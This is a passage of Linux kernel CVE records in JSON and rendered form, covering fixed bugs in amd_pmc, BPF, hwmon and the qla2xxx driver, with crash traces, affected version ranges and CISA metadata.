"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nplatform/x86/amd: Fix refcount leak in amd_pmc_probe\n\npci_get_domain_bus_and_slot() takes reference, the caller should release\nthe reference by calling pci_dev_put() after use. Call pci_dev_put() in\nthe error path to fix this."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:23.804Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3944162821295993ec89992dec98ab6be6306cc0"
},
{
"url": "https://git.kernel.org/stable/c/ccb32e2be14271a60e9ba89c6d5660cc9998773c"
}
],
"title": "platform/x86/amd: Fix refcount leak in amd_pmc_probe",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48881",
"datePublished": "2024-08-21T06:10:12.573Z",
"dateReserved": "2024-07-16T11:38:08.924Z",
"dateUpdated": "2025-05-04T08:25:23.804Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43837 (GCVE-0-2024-43837)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix null pointer dereference in resolve_prog_type() for BPF_PROG_TYPE_EXT
When loading a EXT program without specifying `attr->attach_prog_fd`,
the `prog->aux->dst_prog` will be null. At this time, calling
resolve_prog_type() anywhere will result in a null pointer dereference.
Example stack trace:
[ 8.107863] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000004
[ 8.108262] Mem abort info:
[ 8.108384] ESR = 0x0000000096000004
[ 8.108547] EC = 0x25: DABT (current EL), IL = 32 bits
[ 8.108722] SET = 0, FnV = 0
[ 8.108827] EA = 0, S1PTW = 0
[ 8.108939] FSC = 0x04: level 0 translation fault
[ 8.109102] Data abort info:
[ 8.109203] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000
[ 8.109399] CM = 0, WnR = 0, TnD = 0, TagAccess = 0
[ 8.109614] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0
[ 8.109836] user pgtable: 4k pages, 48-bit VAs, pgdp=0000000101354000
[ 8.110011] [0000000000000004] pgd=0000000000000000, p4d=0000000000000000
[ 8.112624] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP
[ 8.112783] Modules linked in:
[ 8.113120] CPU: 0 PID: 99 Comm: may_access_dire Not tainted 6.10.0-rc3-next-20240613-dirty #1
[ 8.113230] Hardware name: linux,dummy-virt (DT)
[ 8.113390] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)
[ 8.113429] pc : may_access_direct_pkt_data+0x24/0xa0
[ 8.113746] lr : add_subprog_and_kfunc+0x634/0x8e8
[ 8.113798] sp : ffff80008283b9f0
[ 8.113813] x29: ffff80008283b9f0 x28: ffff800082795048 x27: 0000000000000001
[ 8.113881] x26: ffff0000c0bb2600 x25: 0000000000000000 x24: 0000000000000000
[ 8.113897] x23: ffff0000c1134000 x22: 000000000001864f x21: ffff0000c1138000
[ 8.113912] x20: 0000000000000001 x19: ffff0000c12b8000 x18: ffffffffffffffff
[ 8.113929] x17: 0000000000000000 x16: 0000000000000000 x15: 0720072007200720
[ 8.113944] x14: 0720072007200720 x13: 0720072007200720 x12: 0720072007200720
[ 8.113958] x11: 0720072007200720 x10: 0000000000f9fca4 x9 : ffff80008021f4e4
[ 8.113991] x8 : 0101010101010101 x7 : 746f72705f6d656d x6 : 000000001e0e0f5f
[ 8.114006] x5 : 000000000001864f x4 : ffff0000c12b8000 x3 : 000000000000001c
[ 8.114020] x2 : 0000000000000002 x1 : 0000000000000000 x0 : 0000000000000000
[ 8.114126] Call trace:
[ 8.114159] may_access_direct_pkt_data+0x24/0xa0
[ 8.114202] bpf_check+0x3bc/0x28c0
[ 8.114214] bpf_prog_load+0x658/0xa58
[ 8.114227] __sys_bpf+0xc50/0x2250
[ 8.114240] __arm64_sys_bpf+0x28/0x40
[ 8.114254] invoke_syscall.constprop.0+0x54/0xf0
[ 8.114273] do_el0_svc+0x4c/0xd8
[ 8.114289] el0_svc+0x3c/0x140
[ 8.114305] el0t_64_sync_handler+0x134/0x150
[ 8.114331] el0t_64_sync+0x168/0x170
[ 8.114477] Code: 7100707f 54000081 f9401c00 f9403800 (b9400403)
[ 8.118672] ---[ end trace 0000000000000000 ]---
One way to fix it is by forcing `attach_prog_fd` non-empty when
bpf_prog_load(). But this will lead to `libbpf_probe_bpf_prog_type`
API broken which use verifier log to probe prog type and will log
nothing if we reject invalid EXT prog before bpf_check().
Another way is by adding null check in resolve_prog_type().
The issue was introduced by commit 4a9c7bbe2ed4 ("bpf: Resolve to
prog->aux->dst_prog->type only for BPF_PROG_TYPE_EXT") which wanted
to correct type resolution for BPF_PROG_TYPE_TRACING programs. Before
that, the type resolution of BPF_PROG_TYPE_EXT prog actually follows
the logic below:
prog->aux->dst_prog ? prog->aux->dst_prog->type : prog->type;
It implies that when EXT program is not yet attached to `dst_prog`,
the prog type should be EXT itself. This code worked fine in the past.
So just keep using it.
Fix this by returning `prog->type` for BPF_PROG_TYPE_EXT if `dst_prog`
is not present in resolve_prog_type().
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43837",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:08:08.802166Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:23.037Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/linux/bpf_verifier.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fcac5feb06f31ee4c88bca9bf98d8bc3ca7d2615",
"status": "affected",
"version": "4a9c7bbe2ed4d2b240674b1fb606c41d3940c412",
"versionType": "git"
},
{
"lessThan": "9d40fd516aeae6779e3c84c6b96700ca76285847",
"status": "affected",
"version": "4a9c7bbe2ed4d2b240674b1fb606c41d3940c412",
"versionType": "git"
},
{
"lessThan": "b29a880bb145e1f1c1df5ab88ed26b1495ff9f09",
"status": "affected",
"version": "4a9c7bbe2ed4d2b240674b1fb606c41d3940c412",
"versionType": "git"
},
{
"lessThan": "f7866c35873377313ff94398f17d425b28b71de1",
"status": "affected",
"version": "4a9c7bbe2ed4d2b240674b1fb606c41d3940c412",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/linux/bpf_verifier.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.18"
},
{
"lessThan": "5.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix null pointer dereference in resolve_prog_type() for BPF_PROG_TYPE_EXT\n\nWhen loading a EXT program without specifying `attr-\u003eattach_prog_fd`,\nthe `prog-\u003eaux-\u003edst_prog` will be null. At this time, calling\nresolve_prog_type() anywhere will result in a null pointer dereference.\n\nExample stack trace:\n\n[ 8.107863] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000004\n[ 8.108262] Mem abort info:\n[ 8.108384] ESR = 0x0000000096000004\n[ 8.108547] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 8.108722] SET = 0, FnV = 0\n[ 8.108827] EA = 0, S1PTW = 0\n[ 8.108939] FSC = 0x04: level 0 translation fault\n[ 8.109102] Data abort info:\n[ 8.109203] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000\n[ 8.109399] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 8.109614] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 8.109836] user pgtable: 4k pages, 48-bit VAs, pgdp=0000000101354000\n[ 8.110011] [0000000000000004] pgd=0000000000000000, p4d=0000000000000000\n[ 8.112624] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP\n[ 8.112783] Modules linked in:\n[ 8.113120] CPU: 0 PID: 99 Comm: may_access_dire Not tainted 6.10.0-rc3-next-20240613-dirty #1\n[ 8.113230] Hardware name: linux,dummy-virt (DT)\n[ 8.113390] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 8.113429] pc : may_access_direct_pkt_data+0x24/0xa0\n[ 8.113746] lr : add_subprog_and_kfunc+0x634/0x8e8\n[ 8.113798] sp : ffff80008283b9f0\n[ 8.113813] x29: ffff80008283b9f0 x28: ffff800082795048 x27: 0000000000000001\n[ 8.113881] x26: ffff0000c0bb2600 x25: 0000000000000000 x24: 0000000000000000\n[ 8.113897] x23: ffff0000c1134000 x22: 000000000001864f x21: ffff0000c1138000\n[ 8.113912] x20: 0000000000000001 x19: ffff0000c12b8000 x18: ffffffffffffffff\n[ 8.113929] x17: 0000000000000000 x16: 0000000000000000 x15: 0720072007200720\n[ 8.113944] x14: 0720072007200720 x13: 0720072007200720 x12: 0720072007200720\n[ 8.113958] x11: 0720072007200720 x10: 0000000000f9fca4 x9 : ffff80008021f4e4\n[ 8.113991] x8 : 0101010101010101 x7 : 746f72705f6d656d x6 : 000000001e0e0f5f\n[ 8.114006] x5 : 000000000001864f x4 : ffff0000c12b8000 x3 : 000000000000001c\n[ 8.114020] x2 : 0000000000000002 x1 : 0000000000000000 x0 : 0000000000000000\n[ 8.114126] Call trace:\n[ 8.114159] may_access_direct_pkt_data+0x24/0xa0\n[ 8.114202] bpf_check+0x3bc/0x28c0\n[ 8.114214] bpf_prog_load+0x658/0xa58\n[ 8.114227] __sys_bpf+0xc50/0x2250\n[ 8.114240] __arm64_sys_bpf+0x28/0x40\n[ 8.114254] invoke_syscall.constprop.0+0x54/0xf0\n[ 8.114273] do_el0_svc+0x4c/0xd8\n[ 8.114289] el0_svc+0x3c/0x140\n[ 8.114305] el0t_64_sync_handler+0x134/0x150\n[ 8.114331] el0t_64_sync+0x168/0x170\n[ 8.114477] Code: 7100707f 54000081 f9401c00 f9403800 (b9400403)\n[ 8.118672] ---[ end trace 0000000000000000 ]---\n\nOne way to fix it is by forcing `attach_prog_fd` non-empty when\nbpf_prog_load(). But this will lead to `libbpf_probe_bpf_prog_type`\nAPI broken which use verifier log to probe prog type and will log\nnothing if we reject invalid EXT prog before bpf_check().\n\nAnother way is by adding null check in resolve_prog_type().\n\nThe issue was introduced by commit 4a9c7bbe2ed4 (\"bpf: Resolve to\nprog-\u003eaux-\u003edst_prog-\u003etype only for BPF_PROG_TYPE_EXT\") which wanted\nto correct type resolution for BPF_PROG_TYPE_TRACING programs. Before\nthat, the type resolution of BPF_PROG_TYPE_EXT prog actually follows\nthe logic below:\n\n prog-\u003eaux-\u003edst_prog ? prog-\u003eaux-\u003edst_prog-\u003etype : prog-\u003etype;\n\nIt implies that when EXT program is not yet attached to `dst_prog`,\nthe prog type should be EXT itself. This code worked fine in the past.\nSo just keep using it.\n\nFix this by returning `prog-\u003etype` for BPF_PROG_TYPE_EXT if `dst_prog`\nis not present in resolve_prog_type()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:21.949Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fcac5feb06f31ee4c88bca9bf98d8bc3ca7d2615"
},
{
"url": "https://git.kernel.org/stable/c/9d40fd516aeae6779e3c84c6b96700ca76285847"
},
{
"url": "https://git.kernel.org/stable/c/b29a880bb145e1f1c1df5ab88ed26b1495ff9f09"
},
{
"url": "https://git.kernel.org/stable/c/f7866c35873377313ff94398f17d425b28b71de1"
}
],
"title": "bpf: Fix null pointer dereference in resolve_prog_type() for BPF_PROG_TYPE_EXT",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43837",
"datePublished": "2024-08-17T09:21:53.763Z",
"dateReserved": "2024-08-17T09:11:59.274Z",
"dateUpdated": "2025-05-04T09:27:21.949Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48942 (GCVE-0-2022-48942)
Vulnerability from cvelistv5
Published
2024-08-22 03:30
Modified
2025-05-04 08:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
hwmon: Handle failure to register sensor with thermal zone correctly
If an attempt is made to a sensor with a thermal zone and it fails,
the call to devm_thermal_zone_of_sensor_register() may return -ENODEV.
This may result in crashes similar to the following.
Unable to handle kernel NULL pointer dereference at virtual address 00000000000003cd
...
Internal error: Oops: 96000021 [#1] PREEMPT SMP
...
pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)
pc : mutex_lock+0x18/0x60
lr : thermal_zone_device_update+0x40/0x2e0
sp : ffff800014c4fc60
x29: ffff800014c4fc60 x28: ffff365ee3f6e000 x27: ffffdde218426790
x26: ffff365ee3f6e000 x25: 0000000000000000 x24: ffff365ee3f6e000
x23: ffffdde218426870 x22: ffff365ee3f6e000 x21: 00000000000003cd
x20: ffff365ee8bf3308 x19: ffffffffffffffed x18: 0000000000000000
x17: ffffdde21842689c x16: ffffdde1cb7a0b7c x15: 0000000000000040
x14: ffffdde21a4889a0 x13: 0000000000000228 x12: 0000000000000000
x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000
x8 : 0000000001120000 x7 : 0000000000000001 x6 : 0000000000000000
x5 : 0068000878e20f07 x4 : 0000000000000000 x3 : 00000000000003cd
x2 : ffff365ee3f6e000 x1 : 0000000000000000 x0 : 00000000000003cd
Call trace:
mutex_lock+0x18/0x60
hwmon_notify_event+0xfc/0x110
0xffffdde1cb7a0a90
0xffffdde1cb7a0b7c
irq_thread_fn+0x2c/0xa0
irq_thread+0x134/0x240
kthread+0x178/0x190
ret_from_fork+0x10/0x20
Code: d503201f d503201f d2800001 aa0103e4 (c8e47c02)
Jon Hunter reports that the exact call sequence is:
hwmon_notify_event()
--> hwmon_thermal_notify()
--> thermal_zone_device_update()
--> update_temperature()
--> mutex_lock()
The hwmon core needs to handle all errors returned from calls
to devm_thermal_zone_of_sensor_register(). If the call fails
with -ENODEV, report that the sensor was not attached to a
thermal zone but continue to register the hwmon device.
References
| URL | Tags | |
|---|---|---|
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48942",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:33:12.509402Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:10.867Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/hwmon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "962b2a3188bfa5388756ffbc47dfa5ff59cb8011",
"status": "affected",
"version": "1597b374af22266266e1e20612208c4b11359ad4",
"versionType": "git"
},
{
"lessThan": "7efe8499cb90651c540753f4269d2d43ede14223",
"status": "affected",
"version": "1597b374af22266266e1e20612208c4b11359ad4",
"versionType": "git"
},
{
"lessThan": "8a1969e14ad93663f9a3ed02ccc2138da9956a0e",
"status": "affected",
"version": "1597b374af22266266e1e20612208c4b11359ad4",
"versionType": "git"
},
{
"lessThan": "1b5f517cca36292076d9e38fa6e33a257703e62e",
"status": "affected",
"version": "1597b374af22266266e1e20612208c4b11359ad4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/hwmon/hwmon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.8"
},
{
"lessThan": "5.8",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.103",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.26",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.12",
"versionStartIncluding": "5.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "5.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: Handle failure to register sensor with thermal zone correctly\n\nIf an attempt is made to a sensor with a thermal zone and it fails,\nthe call to devm_thermal_zone_of_sensor_register() may return -ENODEV.\nThis may result in crashes similar to the following.\n\nUnable to handle kernel NULL pointer dereference at virtual address 00000000000003cd\n...\nInternal error: Oops: 96000021 [#1] PREEMPT SMP\n...\npstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\npc : mutex_lock+0x18/0x60\nlr : thermal_zone_device_update+0x40/0x2e0\nsp : ffff800014c4fc60\nx29: ffff800014c4fc60 x28: ffff365ee3f6e000 x27: ffffdde218426790\nx26: ffff365ee3f6e000 x25: 0000000000000000 x24: ffff365ee3f6e000\nx23: ffffdde218426870 x22: ffff365ee3f6e000 x21: 00000000000003cd\nx20: ffff365ee8bf3308 x19: ffffffffffffffed x18: 0000000000000000\nx17: ffffdde21842689c x16: ffffdde1cb7a0b7c x15: 0000000000000040\nx14: ffffdde21a4889a0 x13: 0000000000000228 x12: 0000000000000000\nx11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000\nx8 : 0000000001120000 x7 : 0000000000000001 x6 : 0000000000000000\nx5 : 0068000878e20f07 x4 : 0000000000000000 x3 : 00000000000003cd\nx2 : ffff365ee3f6e000 x1 : 0000000000000000 x0 : 00000000000003cd\nCall trace:\n mutex_lock+0x18/0x60\n hwmon_notify_event+0xfc/0x110\n 0xffffdde1cb7a0a90\n 0xffffdde1cb7a0b7c\n irq_thread_fn+0x2c/0xa0\n irq_thread+0x134/0x240\n kthread+0x178/0x190\n ret_from_fork+0x10/0x20\nCode: d503201f d503201f d2800001 aa0103e4 (c8e47c02)\n\nJon Hunter reports that the exact call sequence is:\n\nhwmon_notify_event()\n --\u003e hwmon_thermal_notify()\n --\u003e thermal_zone_device_update()\n --\u003e update_temperature()\n --\u003e mutex_lock()\n\nThe hwmon core needs to handle all errors returned from calls\nto devm_thermal_zone_of_sensor_register(). If the call fails\nwith -ENODEV, report that the sensor was not attached to a\nthermal zone but continue to register the hwmon device."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:26:36.418Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/962b2a3188bfa5388756ffbc47dfa5ff59cb8011"
},
{
"url": "https://git.kernel.org/stable/c/7efe8499cb90651c540753f4269d2d43ede14223"
},
{
"url": "https://git.kernel.org/stable/c/8a1969e14ad93663f9a3ed02ccc2138da9956a0e"
},
{
"url": "https://git.kernel.org/stable/c/1b5f517cca36292076d9e38fa6e33a257703e62e"
}
],
"title": "hwmon: Handle failure to register sensor with thermal zone correctly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48942",
"datePublished": "2024-08-22T03:30:12.812Z",
"dateReserved": "2024-08-22T01:27:53.623Z",
"dateUpdated": "2025-05-04T08:26:36.418Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42287 (GCVE-0-2024-42287)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 12:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Complete command early within lock
A crash was observed while performing NPIV and FW reset,
BUG: kernel NULL pointer dereference, address: 000000000000001c
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 1 PREEMPT_RT SMP NOPTI
RIP: 0010:dma_direct_unmap_sg+0x51/0x1e0
RSP: 0018:ffffc90026f47b88 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000021 RCX: 0000000000000002
RDX: 0000000000000021 RSI: 0000000000000000 RDI: ffff8881041130d0
RBP: ffff8881041130d0 R08: 0000000000000000 R09: 0000000000000034
R10: ffffc90026f47c48 R11: 0000000000000031 R12: 0000000000000000
R13: 0000000000000000 R14: ffff8881565e4a20 R15: 0000000000000000
FS: 00007f4c69ed3d00(0000) GS:ffff889faac80000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000000000001c CR3: 0000000288a50002 CR4: 00000000007706e0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
PKRU: 55555554
Call Trace:
<TASK>
? __die_body+0x1a/0x60
? page_fault_oops+0x16f/0x4a0
? do_user_addr_fault+0x174/0x7f0
? exc_page_fault+0x69/0x1a0
? asm_exc_page_fault+0x22/0x30
? dma_direct_unmap_sg+0x51/0x1e0
? preempt_count_sub+0x96/0xe0
qla2xxx_qpair_sp_free_dma+0x29f/0x3b0 [qla2xxx]
qla2xxx_qpair_sp_compl+0x60/0x80 [qla2xxx]
__qla2x00_abort_all_cmds+0xa2/0x450 [qla2xxx]
The command completion was done early while aborting the commands in driver
unload path but outside lock to avoid the WARN_ON condition of performing
dma_free_attr within the lock. However this caused race condition while
command completion via multiple paths causing system crash.
Hence complete the command early in unload path but within the lock to
avoid race condition.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9189f20b4c5307c0998682bb522e481b4567a8b8 Version: 231cfa78ec5badd84a1a2b09465bfad1a926aba1 Version: d6f7377528d2abf338e504126e44439541be8f7d Version: cd0a1804ac5bab2545ac700c8d0fe9ae9284c567 Version: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 Version: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 Version: 0367076b0817d5c75dfb83001ce7ce5c64d803a9 Version: 415d614344a4f1bbddf55d724fc7eb9ef4b39aad |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42287",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:16.790105Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:30.183Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "af46649304b0c9cede4ccfc2be2561ce8ed6a2ea",
"status": "affected",
"version": "9189f20b4c5307c0998682bb522e481b4567a8b8",
"versionType": "git"
},
{
"lessThan": "57ba7563712227647f82a92547e82c96cd350553",
"status": "affected",
"version": "231cfa78ec5badd84a1a2b09465bfad1a926aba1",
"versionType": "git"
},
{
"lessThan": "9117337b04d789bd08fdd9854a40bec2815cd3f6",
"status": "affected",
"version": "d6f7377528d2abf338e504126e44439541be8f7d",
"versionType": "git"
},
{
"lessThan": "814f4a53cc86f7ea8b501bfb1723f24fd29ef5ee",
"status": "affected",
"version": "cd0a1804ac5bab2545ac700c8d0fe9ae9284c567",
"versionType": "git"
},
{
"lessThan": "314efe3f87949a568f512f05df20bf47b81cf232",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "36fdc5319c4d0ec8b8938ec4769764098a246bfb",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"lessThan": "4475afa2646d3fec176fc4d011d3879b26cb26e3",
"status": "affected",
"version": "0367076b0817d5c75dfb83001ce7ce5c64d803a9",
"versionType": "git"
},
{
"status": "affected",
"version": "415d614344a4f1bbddf55d724fc7eb9ef4b39aad",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_os.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.3"
},
{
"lessThan": "6.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.4.240",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.10.177",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.15.105",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "6.1.22",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
